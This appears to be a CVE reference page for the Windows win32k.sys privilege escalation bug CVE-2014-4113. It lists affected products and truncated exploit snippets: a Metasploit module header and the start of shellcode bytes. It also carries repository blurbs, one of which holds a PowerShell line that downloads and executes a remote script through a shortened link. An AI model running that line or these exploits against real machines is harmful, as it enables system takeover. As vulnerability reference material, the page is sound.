CVE-2014-4113

Published: 15/10/2014 Updated: 26/02/2019
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 744
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."

Vulnerable Products

microsoft windows 7
microsoft windows 8.1
microsoft windows server 2003
microsoft windows vista
microsoft windows server 2012 r2
microsoft windows rt 8.1
microsoft windows 8
microsoft windows server 2012
microsoft windows server 2008
microsoft windows server 2008 r2
microsoft windows rt

Exploits

Microsoft Windows versions 8.0 and 8.1 on x64 TrackPopupMenu privilege escalation exploit that leverages the vulnerability documented in MS14-058 ...
This Metasploit module exploits a NULL Pointer Dereference in win32k.sys. The vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This Metasploit module has been tested successfully on Windows XP SP3, Wind ...
## # This module requires Metasploit: metasploit.com/download # Current source: github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Windows ...
#include "hd.h" // EDB Note ~ Download: github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945.rar byte __s_code[]={ 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 , 0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 , ...
# Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058) # CVE-2014-4113 Privilege Escalation # www.offensive-security.com # Thx to Moritz Jodeit for the beautiful writeup # www.exploit-db.com/docs/35152.pdf # Target OS Windows 8.0 - 8.1 x64 # Author: Matteo Memelli ryujin <at> offensive-security.com # EDB Note: ...
Sources: labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf github.com/sam-b/CVE-2014-4113 EDB Mirror: www.exploit-db.com/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113.pdf Trigger and exploit code for CVE-2014-4113: github.com/offensive-security/exploitdb ...

Github Repositories

Awesome Windows Exploitation A curated list of awesome Windows Exploitation resources, and shiny things There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Table of Contents Windows stack overflows Windows heap overflows Kernel based Windows overflows Windows Kernel Memory Corruption Re

Cobalt-Strike-Cheat-Sheet Cobalt Strike Cobalt Strike is threat emulation software Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful grap

CVE CVE-2014-4113 MS16-098 HEVD Stack Overflow Win7 SP1 x64 Win10 1709 x64 ArbitraryOverwrite Win7 SP1 x64 Win8.1 x64 Win10 1703 x64 Integer Overflow NULL Pointer Dereference Win7 SP1 x64 (x) Win7 SP1 x86 Uninitialized Memory Stack Win7 SP1 x64 Non-Paged Pool Overflow Win7 SP1 x86 Windows kernel experiments simple notes Programming simple cmd reverse shell keyl

noted

Windows stack overflows Stack Base Overflow Articles + Win32 Buffer Overflows (Location, Exploitation and Prevention) - by Dark spyrit [1999] + Writing Stack Based Overflows on Windows - by Nish Bhalla [2005] + Stack Smashing as of Today - by Hagen Fritsch [2009] + SMASHING C++ VPTRS - by rix [2000] ## Windows heap overflows Heap Base Overflow Articles + Third Generat

Technical Write-Up on and PoC Exploit for CVE-2020-11519 and CVE-2020-11520

Technical Write-up on CVE-2020-11519 and CVE-2020-11520 Date: June 2020 Author: Dennis Elser (code: github) Table of Contents Introduction Approach and Technical Description CVE-2020-11519 CVE-2020-11520 Proof-of-Concept Exploit Disclosure Timeline Solution Checksums References Introduction In reference to its web representation, Winmagic SecureDoc "allows businesses

Certified Red Team Operator

CRTO Certified Red Team Operator Course Introduction Command & Control External Reconnaissance Initial Compromise Host Reconnaissance Host Persistence Host Privilege Escalation Domain Reconnaissance Lateral Movement Credentials & User Impersonation Password Cracking Tips & Tricks Session Passing Pivoting Data Protection API Kerberos Active Directory Cer

OSEE Preparation

AWE/OSEE Preparation Blog addaxsoft.com/blog/offensive-security-advanced-windows-exploitation-awe-osee-review/ infosecflash.com/2018/11/04/my-awe-experience/ trickster0.wordpress.com/2018/10/27/awe-course-review-by-offensive-security/ www.jscybersec.io/blogpage/Offensive-Security-Exploitation-Expert-OSEE Public Reference Materials by Module Modu

PowerShell CVE-2014-4113

CVE-2014-4113 PowerShell CVE-2014-4113 x64 Windows Only iex (New-Object Net.WebClient).DownloadString('bit.ly/1qosbJH')

Trigger and exploit code for CVE-2014-4113

CVE-2014-4113 Trigger and exploit code for CVE-2014-4113

Exploit CVE-2014-4113

Exploit-CVE-2014-4113 CVE-2014-4113 is a local privilege escalation exploit. You can get SYSTEM privilege. Supported platform: x86; Windows XP and Windows 7. Usage: open cmd.exe, change to the directory containing the program, and run the following command: cve-2014-4113.exe [target program name] for example: cve-2014-4113.exe calc.exe

Recent Articles

Zero-day hacking group resorts to UNICORN SMUT-SLINGING
The Register • Darren Pauli • 26 Nov 2014

Playboy ploy not beneath APT3

Sysadmins who have not yet patched their Windows boxes against the 18-year-old "unicorn-like" OLE bug disclosed last month could expect a deluge of spear phishing smut from a group once confined to lofty targeted zero-day attacks. The talented APT3 group was behind widespread zero-day attacks code-named Clandestine Fox earlier this year and was now targeting recently patched Windows vulnerabilities, according to FireEye researchers. That group had begun spewing spear-phishing emails targeting tw...

Microsoft Security Updates October 2014
Securelist • Kurt Baumgartner • 14 Oct 2014

Update (2014.10.15) – administrative notes for preparation… Friends on Twitter let me know their update cycle took close to 20 minutes on Windows 7. Yesterday, others on 8.1 told me their update download was around a gig, for some it was ~200 mb. Also, this cycle likely requires everyone a reboot to complete. ******* This morning was possibly one of the most information rich in the history of Microsoft’s patch Tuesdays. Last month, we pointed out the Aurora Panda/DeputyDog actor was l...